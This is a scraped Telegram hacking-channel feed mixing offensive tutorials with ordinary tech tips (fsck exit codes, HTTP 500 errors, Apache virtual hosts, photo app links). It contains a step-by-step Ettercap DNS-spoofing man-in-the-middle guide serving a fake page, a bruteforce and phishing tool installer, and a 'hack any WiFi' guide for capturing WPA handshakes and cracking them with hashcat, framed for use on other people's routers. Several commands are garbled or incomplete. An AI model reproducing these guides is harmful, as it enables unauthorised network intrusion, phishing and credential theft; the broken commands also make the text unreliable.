UNDERCODE COMMUNITY
2.68K subscribers
1.23K photos
31 videos
2.65K files
80K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
Forwarded from WEB UNDERCODE - PRIVATE
Hot Potato.pdf
1.5 MB
Hot potato is the code name of a Windows privilege escalation technique that was discovered by Stephen Breen
Forwarded from WEB UNDERCODE - PRIVATE
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Understanding the exit codes for the fsck command #FastTips
This is a list of codes that can be returned from fsck after checking the disk. Your exit code will be the sum of these codes if you analyze one disc. If you use fsck on multiple devices, it will return a bitwise OR of two sums.

0 - no errors

1 - fixed file system errors

2 - the system must be rebooted

4 - Filesystem errors left unpatched

8 - Operational error

16 - usage or syntax error

32 - Fsck canceled at user request

128 - Shared library error

You can check the exit code of the last run command using the echo $? Command.



▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from WEB UNDERCODE - PRIVATE
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘MAN-IN-MIDDLE ATTACK #ForBeginers :

πŸ„»πŸ„΄πŸ…ƒ'πŸ…‚ πŸ…‚πŸ…ƒπŸ„°πŸ…πŸ…ƒ :

Launch the Parrot or Kali Linux machine to get started.

Set up the DNS config file in Ettercap

1) Setup the command terminal and change the DNS configuration of the Ettercap by typing the following syntax into the editor of your choice.

$ gedit /etc/ettercap/etter.dns

2) You will be displayed the DNS configuration file.

3) Next, you’ll need to type your address in the terminal

>* a 10.0.2.15

4) Check your IP address by typing ifconfig in a new terminal if you don’t already know what it is.

To save changes, press ctrl+x, and press (y) bottom.

Prepare the Apache server

5) Now, we will move our fake security page to a location on the Apache server and run it. You will need to move your fake page to this apache directory.

6) Run the following command to format the HTML directory:

$ Rm /Var/Www/Html/*

7) Next up, you’ll need to save your fake security page and upload it to the directory we’ve mentioned. Type the following in the terminal to start the upload:

$ mv /root/Desktop/fake.html /var/www/html

8) Now fire up the Apache Server with the following command:

$ sudo service apache2 start

9) You’ll see that the server has successfully launched.

Spoofing with Ettercap addon
Now we’ll see how Ettercap would come into play. We will be DNS spoofing with Ettercap.

10) Launch the app by typing:

$ettercap -G

source linux forum
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from WEB UNDERCODE - PRIVATE
WinDbg Malware Analysis Cheat Sheet.pdf
2 MB
#full + video
Forwarded from WEB UNDERCODE - PRIVATE
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘What is Internal Server Error 500
Every time you open a web page, your browser sends a request to the server that hosts the site, which returns the requested data and a response code. The HTTP response status codes indicate whether the request was successful or not.

The answers are divided into five classes. Codes ranging from 500 to 599 indicate a server error.

The HTTP 500 status code is a generic error response that is returned by the server when another error code does not match. This can be caused by a number of issues that prevent the server from fulfilling the request.

If the page you are visiting throws a 500 error, there is nothing you can do because the error is not caused by your browser or internet connection. Even though the error occurs on the server side, you can try some of the following options:

1) Restart your browser or try using a different one. The chances of the page loading when you refresh your browser are slim, but still worth a try.

2) Try clearing your browser cache. If a page showing a 500 error is cached, after clearing the cache, the browser will ask for a new version of the page.

3) Come back later. In the meantime, the webmaster can fix the server issue.

4) Contact the website owners. The last remaining option is to contact the person in charge of maintaining the website.

@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
new Bug in Excel documents
Epic Manchego-atypical transmission of maldoc takes with it multiple secret stealers
#Vulnerabilities #malwares
Forwarded from UNDERCODE HACKING
Dumping Clear-Text Credentials.pdf
1.6 MB
πŸ¦‘ANOTHER 2020 TERMUX TOOLS INSTALLER SUCH BRUTEFORCE & PHISHING...
#termux

1) pkg install git

2) pkg install python

3) git clone https://github.com/Zian25/UniTools-Termux

4) cd UniTools-Termux

5) python3 utx.py

6) Choose option via numbers

▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Create an Apache Virtual Host tutorial:

πŸ„»πŸ„΄πŸ…ƒ'πŸ…‚ πŸ…‚πŸ…ƒπŸ„°πŸ…πŸ…ƒ :

1) laravel:~$ cd /etc/apache2/sites-available
laravel:/etc/apache2/sites-available$ sudo vi myapp.conf


2) <VirtualHost *:80>
ServerName myapp.localhost.com
DocumentRoot "/home/vagrant/projects/myapp/public"
<Directory "/home/vagrant/projects/myapp/public">
AllowOverride all
</Directory>
</VirtualHost>
ο»Ώ
3) Save the file, then continue below.

laravel:/etc/apache2/sites-available$ cd ../sites-enabled

laravel:/etc/apache2/sites-enabled$ sudo ln -s ../sites-available/myapp.conf

laravel:/etc/apache2/sites-enabled$ sudo service apache2
restart

4) Fixing Permissions
If you’re running a virtual machine under Vagrant, you may want to change the user and group to avoid permission issues.

5) To do this:

laravel:~$ cd /etc/apache2

laravel:/etc/apache2$ sudo vi envvars

6) Change the lines below to contain the desired user and group

export APACHE_RUN_USER=vagrant

export APACHE_RUN_GROUP=vagrant

7) Save the file and restart apache.

laravel:/etc/apache2$ sudo service apache2 restart

unix forum
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
πŸ¦‘NEW GOOD PHOTO EDITORS APPS(IOS/ANDROID):

https://itunes.apple.com/us/app/snapseed/id439438619?mt=8

https://play.google.com/store/apps/details?id=com.niksoftware.snapseed&hl=en

https://itunes.apple.com/us/app/snapseed/id439438619?mt=8

https://itunes.apple.com/us/app/vsco-cam/id588013838?mt=8

https://play.google.com/store/apps/details?id=com.vsco.cam&hl=en

https://vsco.co/

https://itunes.apple.com/us/app/prisma-photo-editor/id1122649984?mt=8

https://play.google.com/store/apps/details?id=com.neuralprisma

https://itunes.apple.com/us/app/adobe-photoshop-express/id331975235?mt=8

https://play.google.com/store/apps/details?id=com.adobe.psmobile

https://www.photoshop.com/products/photoshopexpress

https://itunes.apple.com/us/app/foodie-delicious-camera-for/id1076859004?mt=8

https://play.google.com/store/apps/details?id=com.linecorp.foodcam.android&hl=en

https://itunes.apple.com/us/app/foodie-camera-for-life/id1076859004?mt=8

https://itunes.apple.com/gb/app/adobe-photoshop-lightroom/id878783582?mt=8

https://play.google.com/store/apps/details?id=com.adobe.lrmobile

https://itunes.apple.com/us/app/instacollage-collage-maker/id530957474?mt=8

https://play.google.com/store/apps/details?id=mp.instagcolleage

https://itunes.apple.com/gb/app/adobe-photoshop-fix/id1033713849?mt=8

https://play.google.com/store/apps/details?id=com.adobe.adobephotoshopfix&hl=en_GB

https://play.google.com/store/apps/details?id=to.pho.visagelab&hl=en

https://itunes.apple.com/us/app/visage-perfect-photo-make-app/id489833171?mt=8

https://itunes.apple.com/us/app/afterlight-2/id1293122457?mt=8

https://play.google.com/store/apps/details?id=com.fueled.afterlight&hl=en

https://play.google.com/store/apps/details?id=com.canva.editor

https://play.google.com/store/apps/details?id=com.advasoft.touchretouch&hl=en

https://itunes.apple.com/us/app/touchretouch/id373311252?mt=8

@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
New network Security update & bugs fix for Verizon
#vulnerabilities
Forwarded from WEB UNDERCODE - PRIVATE
VIDEOS RANDOM HACKING .pdf
3.2 MB
Forwarded from UNDERCODE NEWS
The supply chain is planning to launch new Apple Watch and AirPods of third generation
#technologies
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘HACK ANY WIFI WPA-WPA2 VIA AIRCRACK :

1) Enter Password to Log In
Enter your root password to enable access. After entering the login password, press the Enter button to continue.

2) Install aircrack-ng
Soon after logging in, press the Y button. This will enable the installation of aircrack-ng.

3) Turn on airmon-ng
Airmon-ng is the software used to convert the managed mode into the monitor mode. Use the following command to turn on airmon-ng:

$ airmon-ng

4) Find Monitor Name
The next step is to find the monitor name to continue hacking. You can view the monitor name in the interface column. In some cases, you may not be able to view the monitor name. This error occurs if your card is not supported.

5) Begin Monitoring the Network
Enter the following command to begin the monitoring process:

$ airmon-ng start wlan0

6) If you are targeting some other network, then you should replace β€˜wlan0’ with the correct network name.

Enable Monitor Mode Interface
The following command is used to enable the monitor mode interface:

$ iwconfig

7) Kill Processes that Return Errors
Your system may cause some interference. Use the following command to remove this error.

$ airmon-ng check kill

8) Review Monitor Interface
The next step is to review the monitor name. In this case, it is named β€˜wlan0mon.’

Get Names of All Routers
The names of all available routers will appear after you enter the following command.

$ airodump-ng mon0

9) Find the Name of the Router
You will first need to find the name of the specific router that you want to hack.


10) Ensure that the Router Uses WPA or WPA2 Security
If the WPA name appears on the screen, then you can continue hacking.

Note the MAC address and channel number.

11) Monitor the Selected Network
Use the following command to monitor the details of the network you want to hack.

$ airodump-ng -c channel --bssid MAC -w /root/Desktop/ mon0

Wait for Handshake
Wait until you see β€˜WPA HANDSHAKE’ written on your screen.

12) Exit the window by pressing CTRL+C. A cap file will appear on your computer screen.

Rename the cap File
For your ease, you can edit the name of the file. Use the following command for this purpose:

$ mv ./-01.cap name.cap

13) Convert File into hccapx Format
You can convert the file into hccapx format easily with the help of the Kali converter.

Use the following command to do so:

$ cap2hccapx.bin name.cap name.hccapx

14) Install naive-hash-cat
Now, you can crack the password by using this service. Use the following command to begin cracking.

$ sudo git clone https://github.com/brannondorsey/naive-hashcat
$ cd naive-hash-cat


$ curl -L -o dicts/rockyou.txt
Run naive-hash-cat

15) To run the naive-hash-cat service, enter the following command:

$ HASH_FILE=name.hccapx POT_FILE=name.pot HASH_TYPE=2500 ./naive-hash-cat.sh


Wait for the Network Password to Be Cracked
As soon as the password is cracked, it will be mentioned in the file. This process can take months or even years to complete. Enter the following command when this process gets completed to save the password. The cracked password is shown in the last screenshot.
[cc lang=”bash” width=”780β€³]
$ aircrack-ng -a2 -b MAC -w rockyou.txt name.cap

enjoyβ€οΈπŸ‘πŸ»
ru-en forum
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁